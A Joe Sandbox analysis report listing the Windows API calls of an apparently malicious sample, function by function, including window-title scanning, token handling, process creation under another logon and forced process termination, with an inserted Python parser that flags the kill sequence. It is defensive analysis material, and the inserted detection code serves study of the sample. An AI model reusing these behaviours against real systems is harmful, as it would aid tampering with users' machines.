                                                      • Instruction Fuzzy Hash: E0415B71A00209EFEF14AF54DC85A6A7778FF04310F1440A9ED04AA297DB34DE65EBA4
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F7F3AB,00000000,?,?,00000000,?,00F7682C,00000004,00000000,00000000), ref: 00FB824C
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00FB8272
                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00FB82D1
                                                      • ShowWindow.USER32(00000000,00000004), ref: 00FB82E5
                                                      • EnableWindow.USER32(00000000,00000001), ref: 00FB830B
                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FB832F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: b03eb49c84a36789e9843e10c2cfdba92f6abd6bca2205950d2625e711be607a
                                                      • Instruction ID: f64bf47c4b49cca14ab4a2a9bc436137c65cdc659b2bca2cc54f86542b20de7c
                                                      • Opcode Fuzzy Hash: b03eb49c84a36789e9843e10c2cfdba92f6abd6bca2205950d2625e711be607a
                                                      • Instruction Fuzzy Hash: EA419734A01644EFDB21DF16CC95BE47BE9BF86764F1842A5E5084F262CB719C42EF90
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00F84C95
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F84CB2
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F84CEA
                                                      • _wcslen.LIBCMT ref: 00F84D08
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F84D10
                                                      • _wcsstr.LIBVCRUNTIME ref: 00F84D1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                      • String ID:
                                                      • API String ID: 72514467-0
                                                      • Opcode ID: f5ec61ba0dffddd3f8da9fce96c47a5b174eaf2a93af964a9b6048b8c5e83d5a
                                                      • Instruction ID: 0c842af7963247338532ab7891b57d64838dd0920e46a280cc8a309df85587d7
                                                      • Opcode Fuzzy Hash: f5ec61ba0dffddd3f8da9fce96c47a5b174eaf2a93af964a9b6048b8c5e83d5a
                                                      • Instruction Fuzzy Hash: 35210B73A04205BBEB15AB35EC49EBB7F9DDF45760F104039F809CA191EA65EC41B7A0
                                                      APIs
                                                        • Part of subcall function 00F23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F23A97,?,?,00F22E7F,?,?,?,00000000), ref: 00F23AC2
                                                      • _wcslen.LIBCMT ref: 00F9587B
                                                      • CoInitialize.OLE32(00000000), ref: 00F95995
                                                      • CoCreateInstance.OLE32(00FBFCF8,00000000,00000001,00FBFB68,?), ref: 00F959AE
                                                      • CoUninitialize.OLE32 ref: 00F959CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 3172280962-24824748
                                                      • Opcode ID: 6bd9c8d70345fe5993ce943537dc97db46b7a6f2cdbdcad57ef107fad9b844f2
                                                      • Instruction ID: a222624a6df0a6037b34ab13749ee9fd19d675bba4005e32bb136ed956217a5d
                                                      • Opcode Fuzzy Hash: 6bd9c8d70345fe5993ce943537dc97db46b7a6f2cdbdcad57ef107fad9b844f2
                                                      • Instruction Fuzzy Hash: F1D17671A087119FDB15DF24C880A2ABBE1FF89B20F14885DF8899B361D735ED05DB92
                                                      APIs
                                                        • Part of subcall function 00F80FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F80FCA
                                                        • Part of subcall function 00F80FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F80FD6
                                                        • Part of subcall function 00F80FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F80FE5
                                                        • Part of subcall function 00F80FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F80FEC
                                                        • Part of subcall function 00F80FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F81002
                                                      • GetLengthSid.ADVAPI32(?,00000000,00F81335), ref: 00F817AE
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F817BA
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00F817C1
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F817DA
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00F81335), ref: 00F817EE
                                                      • HeapFree.KERNEL32(00000000), ref: 00F817F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: 1dc679d7c14dadb5eb63eaa872c1d36e24754f2804226b61675124a80eb4453c
                                                      • Instruction ID: cca285dd7a10940d2a77a23a9ab303d3189b92f1fb4121bd417059aa17314671
                                                      • Opcode Fuzzy Hash: 1dc679d7c14dadb5eb63eaa872c1d36e24754f2804226b61675124a80eb4453c
                                                      • Instruction Fuzzy Hash: 4511AF72900209EFDB10AFA4DC89BEF7BADFB41365F10421DF441A7111C739A945EBA0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F814FF
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00F81506
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F81515
                                                      • CloseHandle.KERNEL32(00000004), ref: 00F81520
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F8154F
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F81563
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: fcaffc4de2c3e7e3836d4a1936d208b83b958a47c82f3e3b226b1d36c610320d
                                                      • Instruction ID: b34026378c052a026b29c86fdc394468557b8037626685062501919bd791d3a6
                                                      • Opcode Fuzzy Hash: fcaffc4de2c3e7e3836d4a1936d208b83b958a47c82f3e3b226b1d36c610320d
                                                      • Instruction Fuzzy Hash: 7111477250420DABDF11DF98DD49BDB7BADFB48754F084224FA05A2060C3718E61ABA0
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00F43379,00F42FE5), ref: 00F43390
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F4339E
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F433B7
                                                      • SetLastError.KERNEL32(00000000,?,00F43379,00F42FE5), ref: 00F43409
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 3edcb6c567a96d713a45aeffaa0325e96ae60825f39b849ff65c21fd624e2e7f
                                                      • Instruction ID: aaf0a2caba6532bc36b7cf37b1cc23ac8b79b30e84b7cffe5379555de0db6444
                                                      • Opcode Fuzzy Hash: 3edcb6c567a96d713a45aeffaa0325e96ae60825f39b849ff65c21fd624e2e7f
                                                      • Instruction Fuzzy Hash: 9F01F733A09326BFA6292B747CC5A673E94EB457797200329FE20C52F1EF114E0279C4
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00F55686,00F63CD6,?,00000000,?,00F55B6A,?,?,?,?,?,00F4E6D1,?,00FE8A48), ref: 00F52D78
                                                      • _free.LIBCMT ref: 00F52DAB
                                                      • _free.LIBCMT ref: 00F52DD3
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00F4E6D1,?,00FE8A48,00000010,00F24F4A,?,?,00000000,00F63CD6), ref: 00F52DE0
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00F4E6D1,?,00FE8A48,00000010,00F24F4A,?,?,00000000,00F63CD6), ref: 00F52DEC
                                                      • _abort.LIBCMT ref: 00F52DF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: a6635f90d72576d9dfea81cdab98a27609c49560f74be3e79262a3ee4d2d3b25
                                                      • Instruction ID: 1f016c3a7385f815efa433fb66d8d8431a312ed0a8f56f33a42762981feb6aa0
                                                      • Opcode Fuzzy Hash: a6635f90d72576d9dfea81cdab98a27609c49560f74be3e79262a3ee4d2d3b25
                                                      • Instruction Fuzzy Hash: 6CF0CD3290590427C29227397C46E5F36756FC37B3F244719FF24921D2DF28880E7560
                                                      APIs
                                                        • Part of subcall function 00F39639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F39693
                                                        • Part of subcall function 00F39639: SelectObject.GDI32(?,00000000), ref: 00F396A2
                                                        • Part of subcall function 00F39639: BeginPath.GDI32(?), ref: 00F396B9
                                                        • Part of subcall function 00F39639: SelectObject.GDI32(?,00000000), ref: 00F396E2
                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00FB8A4E
                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00FB8A62
                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00FB8A70
                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00FB8A80
                                                      • EndPath.GDI32(?), ref: 00FB8A90
                                                      • StrokePath.GDI32(?), ref: 00FB8AA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: f045eb7f2146fb38344c93500b9015550b1783724162fe46a3155db9d20eddd5
                                                      • Instruction ID: 6940ea5988f342b8d1ee2d75fdd7d69fb39f299175f99bfe0f28216831ed1a70
                                                      • Opcode Fuzzy Hash: f045eb7f2146fb38344c93500b9015550b1783724162fe46a3155db9d20eddd5
                                                      • Instruction Fuzzy Hash: 8911097640010DFFDB129F94DC88EAA7F6CEF083A0F008112BA199A1A1C7719D55EFA0
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00F85218
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F85229
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F85230
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00F85238
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F8524F
                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00F85261
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 848793028645283d9f05f96e222399949f982cd067dbd2490943e59289f0c925
                                                      • Instruction ID: 3ef820420efea580d0de23097c9cc61c2c26a2e886b196ad5d0a27db03d2bca4
                                                      • Opcode Fuzzy Hash: 848793028645283d9f05f96e222399949f982cd067dbd2490943e59289f0c925
                                                      • Instruction Fuzzy Hash: 3C016775E00718BBEB106BA99C49E5FBFB9EF44751F044165FA05E7281DA709C00DFA0
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F21BF4
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F21BFC
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F21C07
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F21C12
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F21C1A
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F21C22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: f90ddfca3a649a7bb67af3bcf3915859b4e2f743a80ef65a0819d63e9a1c1220
                                                      • Instruction ID: 5df69644e24aceadd9e0b154148577e43074889082b9dde1fb3be5c514491560
                                                      • Opcode Fuzzy Hash: f90ddfca3a649a7bb67af3bcf3915859b4e2f743a80ef65a0819d63e9a1c1220
                                                      • Instruction Fuzzy Hash: B90144B0902B5ABDE3008F6A8C85A52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F8EB30
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F8EB46
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00F8EB55
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F8EB64
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F8EB6E
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F8EB75
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: f5db17b92fc5b33e79b0ceea652de4b98826ebb0a9a7f8eb230ed60d1859c730
                                                      • Instruction ID: 4137a82b268d167cdad6cd23bd551ba3f9fda5a10751f87e270fb4e5037846ff
                                                      • Opcode Fuzzy Hash: f5db17b92fc5b33e79b0ceea652de4b98826ebb0a9a7f8eb230ed60d1859c730
                                                      • Instruction Fuzzy Hash: D8F0307254015CBBE7215B529C4DEEF3B7CEFCAB11F000259F641E1091E7A05A01EAF5
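The listing above (PostMessageW/SendMessageTimeoutW with message 0x10, then OpenProcess with mask 0x1F0FFF and TerminateProcess) is the kind of sequence an analyst wants to pull out of a long Joe Sandbox report automatically. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the "APIs" call lines of this report format into structured records, decodes a few window-message constants from the Windows SDK headers (WM_GETTEXT, WM_GETTEXTLENGTH, WM_CLOSE), and flags every function block that opens a process with PROCESS_TERMINATE in its access mask and then calls TerminateProcess. The sample input is copied from two listings on this page; the heuristic itself is the editor's own and is an assumption about what is worth flagging, not a Joe Sandbox signature.

```python
"""Parse Joe Sandbox 'APIs' listings and flag a process-kill call sequence.

Added example; not part of the Joe Sandbox report or the IDA plugin output.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# One call line: "• Api.MODULE(arg,arg,...), ref: ADDR" or "• Api.MODULE ref: ADDR".
# "Part of subcall function XXXXXXXX:" marks calls made from a callee.
CALL_RE = re.compile(
    r"^(?:•\s*)?(?P<sub>Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)

# Values from the Windows SDK headers (winuser.h, winnt.h).
WINDOW_MESSAGES = {0x000D: "WM_GETTEXT", 0x000E: "WM_GETTEXTLENGTH", 0x0010: "WM_CLOSE"}
PROCESS_TERMINATE = 0x0001
MESSAGE_APIS = {"SendMessageW", "PostMessageW", "SendMessageTimeoutW"}


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report printed '?'
    ref: int                    # address of the call site
    subcall: bool               # True for "Part of subcall function" lines


def parse_arg(tok: str) -> Optional[int]:
    """'?' means the sandbox could not resolve the value; otherwise hex, maybe negative."""
    tok = tok.strip()
    if not tok or tok == "?":
        return None
    negative = tok.startswith("-")
    try:
        value = int(tok.lstrip("-"), 16)
    except ValueError:
        return None
    return -value if negative else value


def parse_listing(text: str) -> List[List[Call]]:
    """Group call lines into per-function blocks; each 'APIs' header starts a block."""
    blocks: List[List[Call]] = []
    current: Optional[List[Call]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            blocks.append(current)
            continue
        if line == "Memory Dump Source":
            current = None
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [parse_arg(a) for a in raw_args.split(",")] if raw_args is not None else []
        current.append(Call(m.group("api"), m.group("module"), args,
                            int(m.group("ref"), 16), bool(m.group("sub"))))
    return blocks


def describe(call: Call) -> str:
    """Render a call, decoding the window-message argument where it is known."""
    if call.api in MESSAGE_APIS and len(call.args) > 1 and call.args[1] in WINDOW_MESSAGES:
        return f"{call.api}({WINDOW_MESSAGES[call.args[1]]}) @ {call.ref:08X}"
    return f"{call.api} @ {call.ref:08X}"


def find_kill_sequences(blocks: List[List[Call]]) -> List[int]:
    """Indexes of blocks that OpenProcess with PROCESS_TERMINATE and later TerminateProcess."""
    hits = []
    for i, block in enumerate(blocks):
        opened = False
        for call in block:
            if (call.api == "OpenProcess" and call.args
                    and call.args[0] is not None and call.args[0] & PROCESS_TERMINATE):
                opened = True
            elif call.api == "TerminateProcess" and opened:
                hits.append(i)
                break
    return hits


# Constructed sample: two listings copied from this report page.
SAMPLE = """\
APIs
• IsWindowVisible.USER32(?), ref: 00F84C95
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F84CB2
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F84CEA
• _wcslen.LIBCMT ref: 00F84D08
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F84D10
• _wcsstr.LIBVCRUNTIME ref: 00F84D1A
Memory Dump Source
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F8EB30
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F8EB46
• GetWindowThreadProcessId.USER32(?,?), ref: 00F8EB55
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?), ref: 00F8EB64
• TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00F8EB6E
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F8EB75
Memory Dump Source
"""

if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    for idx in find_kill_sequences(parsed):
        print("kill sequence in block", idx, [describe(c) for c in parsed[idx]])
```

The first block is the window-title scan (WM_GETTEXTLENGTH then WM_GETTEXT followed by an upper-cased substring match); the second is the close-then-terminate routine. Running the parser over a whole report rather than these two excerpts lets you sort hundreds of such blocks by the API pairs you care about instead of scrolling the page.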
                                                      APIs
                                                      • GetClientRect.USER32(?), ref: 00F77452
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F77469
                                                      • GetWindowDC.USER32(?), ref: 00F77475
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00F77484
                                                      • ReleaseDC.USER32(?,00000000), ref: 00F77496
                                                      • GetSysColor.USER32(00000005), ref: 00F774B0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                      • String ID:
                                                      • API String ID: 272304278-0
                                                      • Opcode ID: d38e165e711e8dc3aec90a2b9372761d7693b50068bdef6a7abda02928e10d59
                                                      • Instruction ID: 1113beab4dcbbd590256bb93dae4c41ed374b4250d1cfaa213a99b67c68c59c2
                                                      • Opcode Fuzzy Hash: d38e165e711e8dc3aec90a2b9372761d7693b50068bdef6a7abda02928e10d59
                                                      • Instruction Fuzzy Hash: F5018B32800209EFDB10AF64DC48FAA7BB6FF04321F654264F919A20A0CB311E41FF91
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F8187F
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00F8188B
                                                      • CloseHandle.KERNEL32(?), ref: 00F81894
                                                      • CloseHandle.KERNEL32(?), ref: 00F8189C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00F818A5
                                                      • HeapFree.KERNEL32(00000000), ref: 00F818AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
